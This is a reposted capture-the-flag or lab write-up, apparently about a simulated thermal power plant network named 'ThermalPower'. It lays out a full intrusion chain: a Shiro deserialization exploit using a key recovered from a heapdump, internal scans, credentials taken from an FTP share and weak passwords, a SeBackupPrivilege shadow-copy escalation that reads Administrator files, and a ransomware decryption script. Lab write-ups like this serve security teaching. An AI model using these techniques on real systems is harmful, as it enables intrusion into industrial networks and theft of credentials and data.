ThermalPower

admin · 2025-01-17 08:39:57

External network

The login form has a rememberMe option, so the target is running the Shiro framework.


Tool scan

The scan shows an exposed Spring Boot heapdump. The obvious bet is that the Shiro rememberMe key can be recovered from it, after which Shiro deserialization is a one-shot exploit.


QZYysgMYhG6/CzIJlVpR2g==


Sure enough, one shot: the recovered key is the live rememberMe key and the Shiro deserialization exploit goes straight through.


Internal network proxy


Scan the internal network with fscan

172.22.17.213:8080 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:80 open
172.22.17.213:22 open
172.22.17.6:21 open
[*] NetInfo
[*]172.22.17.6
   [->]WIN-ENGINEER
   [->]172.22.17.6
[*] NetBios 172.22.17.6     WORKGROUP\WIN-ENGINEER
[*] WebTitle http://172.22.17.213:8080 code:302 len:0      title:None redirect url: http://172.22.17.213:8080/login;jsessionid=4C3BE6927F06F140583A6F32A7094EA4
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=4C3BE6927F06F140583A6F32A7094EA4 code:200 len:2936   title:火创能源监控画面管理平台 (Huochuang Energy monitoring screen management platform)
[+] ftp 172.22.17.6:21:anonymous
   [->]Modbus
   [->]PLC
   [->]web.config
   [->]WinCC
   [->]内部软件 (internal software)
   [->]火创能源内部资料 (Huochuang Energy internal documents)
[*] WebTitle http://172.22.17.6        code:200 len:661    title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2

With global traffic forwarding through the proxy turned on, browse the leaked sensitive area (the anonymous FTP share) and pick up account credentials.


Combined with the other information in the documents, this gives the password rule:

For example, Zhang San's account name is zhangsan and his employee number is 0801. The initial password consists of account name + @ + employee number, for example zhangsan@0801.

chenhua/chenhua@0813

Connect with mstsc (RDP)


Privilege escalation

Check the status of SeBackupPrivilege (whoami /priv). With it enabled, a shadow copy of C: can be read regardless of the ACLs on the Administrator profile:

Import-Module .\EnableSeBackupPrivilege.ps1
cd C:\
mkdir tmp
diskshadow /s s.dsh
robocopy /b z:\Users\Administrator\flag . flag02.txt

s.dsh

set context persistent nowriters
add volume c: alias mydrive
create
expose %mydrive% z:

This yields flag2.


172.22.26.xx

fscan the network segment disclosed in the leaked documents

172.22.26.11:80 open
172.22.26.11:445 open
172.22.26.11:1433 open
172.22.26.11:139 open
172.22.26.11:135 open
[*] NetBios 172.22.26.11    WORKGROUP\WIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
   [->]WIN-SCADA
   [->]172.22.26.11
[*] WebTitle http://172.22.26.11       code:200 len:703    title:IIS Windows Server

Connect again


Wait for the screen to load, click the boiler "on" control, and the flag appears.


Ransomware

Back on the desktop there is a ransom note.


Navicat (navi) finds the fourth flag in the database, but it is empty.


Analyze the exe

It encrypts with AEScrypto.


The Baidu Netdisk link in the note provides these two files:

encryptedAesKey is AES_KEY_ENC

privateKey is PRIVATE_KEY

  • First RSA-decrypt the encrypted encryptedAesKey with privateKey to obtain AES_KEY
  • Then use AES_KEY to decrypt the encrypted file ScadaDB.sql.locky to obtain ScadaDB.sql

Converting the XML key to PEM format gives:

-----BEGIN PRIVATE KEY----- ... -----END PRIVATE KEY----- (the full PEM is embedded as private_key in the decryption script below)
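The write-up does not show the XML-to-PEM step, so here is an added example (not the author's code) that does it with the standard library only. It assumes privateKey is in the form .NET's RSA.ToXmlString(true) emits: an <RSAKeyValue> element holding Modulus, Exponent, P, Q, DP, DQ, InverseQ and D as base64 big-endian integers. The script parses that, checks the CRT parameters against n, e, d (a truncated or mis-pasted base64 value fails here instead of producing a key that silently decrypts to garbage), and DER-encodes a PKCS#8 PrivateKeyInfo around a PKCS#1 RSAPrivateKey, which is exactly what "BEGIN PRIVATE KEY" PEM contains and what RSA.importKey in the script below accepts. The sample key is a constructed textbook-sized toy (p=61, q=53) used only to exercise the format.

```python
import base64
import math
import textwrap
import xml.etree.ElementTree as ET

# DER-encoded OID 1.2.840.113549.1.1.1 (rsaEncryption) for the PKCS#8 AlgorithmIdentifier
RSA_OID = bytes.fromhex("2a864886f70d010101")
# Element names and order written by .NET RSA.ToXmlString(true)
XML_FIELDS = ("Modulus", "Exponent", "P", "Q", "DP", "DQ", "InverseQ", "D")


def parse_dotnet_rsa_xml(xml_text):
    """Return {field: int} from an <RSAKeyValue> document (values are base64 big-endian)."""
    root = ET.fromstring(xml_text)
    if root.tag != "RSAKeyValue":
        raise ValueError("not an RSAKeyValue document")
    params = {}
    for name in XML_FIELDS:
        el = root.find(name)
        if el is None or not el.text:
            raise ValueError("missing element " + name)
        params[name] = int.from_bytes(base64.b64decode(el.text.strip()), "big")
    return params


def validate_rsa_params(k):
    """True when the CRT values agree with n, e, d; catches truncated or mis-pasted base64."""
    n, e, d, p, q = k["Modulus"], k["Exponent"], k["D"], k["P"], k["Q"]
    lam = (p - 1) * (q - 1) // math.gcd(p - 1, q - 1)
    return (p * q == n and (e * d) % lam == 1
            and k["DP"] == d % (p - 1) and k["DQ"] == d % (q - 1)
            and k["InverseQ"] == pow(q, -1, p))


def _der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b


def _der(tag, content):
    return bytes([tag]) + _der_len(len(content)) + content


def der_integer(i):
    b = i.to_bytes(max(1, (i.bit_length() + 7) // 8), "big")
    if b[0] & 0x80:          # leading 0x00 keeps the INTEGER positive
        b = b"\x00" + b
    return _der(0x02, b)


def der_sequence(*items):
    return _der(0x30, b"".join(items))


def rsa_params_to_pkcs8_der(k):
    """PKCS#8 PrivateKeyInfo wrapping a PKCS#1 RSAPrivateKey (version, n, e, d, p, q, dp, dq, qinv)."""
    rsa_private_key = der_sequence(
        der_integer(0), der_integer(k["Modulus"]), der_integer(k["Exponent"]), der_integer(k["D"]),
        der_integer(k["P"]), der_integer(k["Q"]), der_integer(k["DP"]), der_integer(k["DQ"]),
        der_integer(k["InverseQ"]))
    algorithm = der_sequence(_der(0x06, RSA_OID), b"\x05\x00")   # rsaEncryption, NULL parameters
    return der_sequence(der_integer(0), algorithm, _der(0x04, rsa_private_key))


def rsa_xml_to_pem(xml_text):
    k = parse_dotnet_rsa_xml(xml_text)
    if not validate_rsa_params(k):
        raise ValueError("inconsistent RSA parameters in XML key")
    body = base64.b64encode(rsa_params_to_pkcs8_der(k)).decode()
    return "-----BEGIN PRIVATE KEY-----\n" + "\n".join(textwrap.wrap(body, 64)) + "\n-----END PRIVATE KEY-----\n"


def ints_to_dotnet_xml(k):
    """Inverse direction, used only to build the constructed sample below."""
    def b64(i):
        return base64.b64encode(i.to_bytes(max(1, (i.bit_length() + 7) // 8), "big")).decode()
    return "<RSAKeyValue>" + "".join("<%s>%s</%s>" % (f, b64(k[f]), f) for f in XML_FIELDS) + "</RSAKeyValue>"


# Constructed toy key (textbook p=61, q=53): useless for real crypto, enough to exercise the format.
TOY_KEY = {"Modulus": 3233, "Exponent": 17, "D": 2753, "P": 61, "Q": 53, "DP": 53, "DQ": 49, "InverseQ": 38}

if __name__ == "__main__":
    print(rsa_xml_to_pem(ints_to_dotnet_xml(TOY_KEY)))
```

Feed the real privateKey file to rsa_xml_to_pem and paste the output into the private_key string of the decryption script; if validate_rsa_params rejects it, the XML was altered in transit and no amount of decryption will recover the AES key.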

RSA decryption gives the AES key (base64 of 32 raw bytes, so AES-256):

cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=


Decrypt the SQL file

# -*- coding: utf-8 -*-
# @Author  : iker
# @Time    : 2024/03/04 16:10
# @Function: RSA Privatekey Decryption & AES CBC Decryption
import base64
from Crypto.Util.Padding import pad, unpad
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5


def rsa_decrypt(data):
    # PEM form of the attacker's privateKey (converted from the .NET XML key)
    private_key = """-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----"""

    data = base64.b64decode(data)
    priobj = Cipher_pkcs1_v1_5.new(RSA.importKey(private_key))
    # PKCS#1 v1.5 decryption; the sentinel (None) comes back when the padding does not check out
    decrypted_data = priobj.decrypt(data, None)
    if decrypted_data is None:
        raise ValueError("RSA decryption failed: wrong private key or corrupted encryptedAesKey")
    return decrypted_data


def padding(data):
    # style(string) - Padding algorithm. It can be 'pkcs7' (default), 'iso7816' or 'x923'.
    if len(data) % AES.block_size != 0:
        return pad(data, AES.block_size, 'pkcs7')
    else:
        return data


def aes_cbc_encrypt(iv, key, data):
    key = padding(key)
    data = padding(data)
    iv = padding(iv)

    aes = AES.new(key, AES.MODE_CBC, iv)
    cipher_data = aes.encrypt(data)
    return cipher_data


def aes_cbc_decrypt(iv, key, data):
    iv = padding(iv)
    key = padding(key)
    data = padding(data)

    aes = AES.new(key, AES.MODE_CBC, iv)
    data = aes.decrypt(data)
    # strip the PKCS7 padding; keep the raw plaintext if the padding bytes are not valid
    try:
        return unpad(data, AES.block_size, 'pkcs7')
    except ValueError:
        return data


def decrypt_file(encrypted_filepath, output_filepath, key):
    with open(encrypted_filepath, 'rb') as f:
        data = f.read()

    # the sample encrypts with an all-zero 16-byte IV
    iv = b'\x00' * 16
    decryption_result = aes_cbc_decrypt(iv, key, data)

    with open(output_filepath, 'wb') as f:
        f.write(decryption_result)


if __name__ == "__main__":
    # encryptedAesKey (AES_KEY_ENC) from the Baidu Netdisk share
    encryptedAesKey = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="
    key = rsa_decrypt(encryptedAesKey)   # 32 raw bytes, i.e. an AES-256 key
    encrypted_filepath = "ScadaDB.sql.locky"
    output_filepath = "ScadaDB.sql"
    decrypt_file(encrypted_filepath, output_filepath, key)

Final result


Originally published on the WeChat official account flowers-boy: ThermalPower

Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear all legal and joint liability; this site bears no legal or joint liability. For questions, contact us by e-mail (an enterprise or otherwise valid mailbox is recommended so the message is not filtered; contact details are on the home page).
Please keep this link when reposting (CN-SEC: thanks to the original author for their work): ThermalPower https://cn-sec.com/archives/3637001.html